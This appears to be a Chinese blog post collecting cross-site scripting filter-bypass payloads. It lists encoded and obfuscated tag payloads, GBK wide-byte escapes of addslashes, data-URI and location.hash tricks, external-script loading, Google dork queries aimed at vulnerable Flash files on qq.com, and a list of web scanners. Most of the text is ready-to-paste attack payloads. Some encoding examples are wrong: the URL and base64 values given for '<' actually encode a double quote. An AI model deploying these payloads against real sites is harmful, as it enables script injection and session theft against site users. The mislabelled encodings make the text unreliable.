xss绕过技巧整理
几种弹窗绕过
alert(1) = Function(alert(1))()
= Function(String.fromCharCode(97,108,101,114,116,40,49,41))()
97,108,101,114,116,40,49,41对应alert(1) ascii码的10进制形式(Text2Dec)
//小写function
(function(){
alert(1)
})()
alert(1) confirm(1) prompt(1)
<SVG/onload=prompt(1)>
<BODY onload="alert('XSS')">
<img src=1 onerror=alert(1)>
<img src onerror=alert(1)>
<script src=alert(1)></scirpt>
<form action="javascript:prompt(1)" method="post"><input name="action" value="b"></form>
eg:
<p class="comment" title=""><svg/a="></p>
<p class="comment" title=""onload='/*"></p>
<p class="comment" title="*/prompt(1)'"></p> ==》<p class="comment" title=""><svg/a=""xxx"/onload='prompt(21)'"></p>//过滤= 括号等 使用xml编码
<svg> <script>prompt(1)</script>
//在SVG向量里面的<script>元素(或者其他CDATA元素 ),会先进行xml解析。因此((十六进制)或者((十进制)或者&lpar;(html实体编码)会被还原成(。可以不封的有:
<img><br><input><li><p><SVG>
其他标签不封闭会造成页面显示错误等问题。xss中最经常用到的编码
html实体编码(10进制与16进制):
如把尖括号编码[ < ] -----> html十进制: < html十六进制:<
javascript的八进制跟十六进制:
如把尖括号编码[ < ] -----> js八进制:\74 js十六进制:\x3c
jsunicode编码:
如把尖括号编码[ < ] ----->jsunicode:\u003c
url编码:
如把尖括号编码[ < ] -----> url: %22
base64编码:
如把尖括号编码[ < ] -----> base64: Ig==一些绕过方法
换行符 %0a
反斜线 %5c (js中字符串可以用\分开)
<> %3C%3E
注释/**/可以代替 空格符
%c0(宽字符gb2312)可以吃掉%5c(反斜线)
javascript中的字符可以写成unicode编码:
< 可以表示为 \u003c , > 可以表示为 \u003e,空格可以表示为\u0020
< 可以表示为 \x3c , > 可以表示为 \x3e,空格可以表示为\x20
<img src=1 onerror=alert(1)> ----> \u003Cimg\u0020src=1\u0020onerror=alert(1)\u003e
----> \x3Cimg\u0020src=1\u0020onerror=alert(1)\x3e
JS字符串中,字符还可以表示为unicode的形式。即:单引号还可以表示为\u0027或\x27,可尝试\有没有被过滤
<textarea>、<title>、<iframe>标签不解析HTML
"h"+"t"+"t"+"p",绕过对http的过滤
<input onfocus="alert(1)" autofocus>,自动执行
<scr<script>ipt>绕过对<script>的过滤
/**/绕过对空格的过滤<script>document.write("<img/**/src='1'/**/onerror='alert(1)'/>");</script>
<script>标签中多对输入可以结合/**/的使用
var a = "";/*"; 值为:";/*,(首先闭合双引号,然后使用/*注释,与下面注释进行闭合)var b = "*/alert(1)//"; 值为:*/alert(1)//
如果是图片可能是判定后缀名在最后加上.jpg
突破对长度的限制<script>eval(location.hash.slice(1))</script>#alert(‘a’)
data协议,绕过chrome
filter.php?url=<a href='data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='>click<a>
IE的注释方式<!--[if IE]><img src=# width=0 height=0 onerror=alert(/insight-labs/)><![endif]-->
chrome会自动对", >, < 进行转换。
<script>alert(1)</script>
chrome会过滤为<script></script>,绕过:<script src='127.0.0.1/1.js'></script> 其中1.jp也可以是1.jpg等,内容为js代码如:alert(1)
chrome如何搜索关键字
基本语句肯定是 site:qq.com filetype:swf
意思是,限定域名为qq.com 文件类型为FLASH文件。
显然这样会搜索出很多FLASH文件,不利于我们后续的漏洞查找,所以我们需要输入某个关键词来进一步缩小范围。
这里我列举一些寻找关键词的方式。
- 已知存在缺陷的FLASH文件名或参数名,如:swfupload,jwplayer等
- 多媒体功能的FLASH文件名,如:upload,player, music, video等
- 调用的外部配置或数据文件后缀,如: xml, php 等
- 前期经验积累下来的程序员特征参数名用词,如: callback, cb , function 等
结合以上经验,使用其中第三条:
搜索: site:qq.com filetype:swf inurl:xml
可以找到这个FLASH
插入漏洞方式
1 JavaScript中字符串之间的运算利用
<a href="javascript:alert(1)//html">click me</a>
<a href="javascript:alert(1)-html">click me</a>
执行呈现相同的效果,因为javascript是弱类型语言,所以字符串与字符串之间的各种运算都是合法的
2 HTML属性在执行时会做HTMLDecode编码
HTML属性:十进制和十六进制,8和Z形式
CSS属性:十进制和十六进制,\6c形式
JavaScript:八进制和十六进制,\56,和\x5c形式,汉字需要使用Unicode编码,\u0000形式
<img src="http://www.baidu.com/img/bdlogo.gif">
<img src="http://www.baidu.com/img/bdlogo.gif";>
需要留出双引号,不可对双引号进行转移
3、宽字节处理addslashs,单引号、双引号、反斜杠之前加反斜杠的情况
原理:网页头部指明这是GBK编码,GBK编码第一字节的范围是0x81~0xFE,第二字节的范围是0x40~0x7E与0x80~0xFE,这样的十六进制表示。而\符号的十六进制表示为0x5C,正好是GBK的低字节中,如果之前有一个高字节,那么正好会被组成一个合法字符。
<?php
header("Content-Type:text/html;charset=GBK");?>
<script>
var a="
<?php
echo addslashes($_GET['url']);
?>
";
</script>
?> 构造:.php?url=123%81";alert(1);//
4、UTF-7编码(仅IE支持,会自动判断是否出现UTF-7编码的字符串)DOM xss特点
- 利用代码也是在地址栏里输入,
- 在JS里,通过location.search得到地址里的代码,类似的还有: A.location.href : 地址栏里的地址, B.location.hash: 地址栏里#及其之后的内容, C.document.referrer: 当前页面的源(比如你从A.com点一个链接进入了B.com,那么B.com里的document.referrer等于A.com)
- 通过JS设置了iframe的src属性,这是一个典型的通过JS操作属性而导致的XSS。
查找此类漏洞的方法
- 以location为关键词进行查找,
- 进而看location传入的参数是否被过滤后再进行使用。
- 如有未过滤而被调用的情况,则考虑如何构造利用代码。
11个免费的Web安全测试工具
- Netsparker Community Edition(Windows) 这个程序可以检测SQL注入和跨页脚本事件。当检测完成之后它会给你提供一些解决方案。
- Websecurify(Windows, Linux, Mac OS X) 这是个简单易用的开源工具,此程序还有一些人插件支持,可以自动检测网页漏洞。运行后可生成多种格式的检测报告
- Wapiti(Windows, Linux, Mac OS X) 这是一个用Python编写的开源的工具,可以检测网页应用程序,探测网页中存在的注入点。
- N-Stalker Free Version(Windows) 此工具可一次检测100个以上的页面,包括跨页脚本的检测。
- skipfish(Windows, Linux, Mac OS X) 这是一个轻量级的安全测试工具,处理速度很快,每秒可处理2000个请求。
- Scrawlr(Windows) HP的一款免费软件,可检测SQL注入漏洞。
- Watcher(Windows) http://websecuritytool.codeplex.com/documentation 这个是Fiddler的插件,可在后台静默运行,可检测跨域提交等。。
- x5s(Windows) http://xss.codeplex.com/releases/view/43170 跟前一个一样也是Fiddler的插件,用于检测存在XSS漏洞,在网页提供给用户输入的地方是否有过滤<, >等字符。
- Exploit-Me(Windows, Linux, Mac OS X) 这个是火狐的插件,由XSS-Me,SQL Inject Me 和 Access-Me 这3个构成,当浏览网页时就会开始检测,可检测XSS漏洞,SQL注入漏洞等。
- WebScarab(Windows, Linux, Mac OS X) 这个实际上是一个代理软件,有很多功能,可以检测XSS跨站脚本漏洞、SQL注入漏洞等。。
- Acunetix Free Version(Windows) 这个是免费版,相对于专业版来说有一些功能限制,不过还是可以用的,可检测网站上的XSS漏洞。
其他
- 二哥的XSS教学 - by gainover
http://xsst.sinaapp.com/example/1-1.php - 心伤的瘦子 [腾讯实例教程] 那些年我们一起学XSS) http://www.wooyun.org/whitehats/%E5%BF%83%E4%BC%A4%E7%9A%84%E7%98%A6%E5%AD%90/type/1/page/1
- HTML特殊字符编码对照表 http://www.jb51.net/onlineread/htmlchar.htm
- html字符实体 http://www.w3school.com.cn/html/html_entities.asp
- xss字符转换工具: http://app.baidu.com/app/enter?appid=280383
没有评论:
发表评论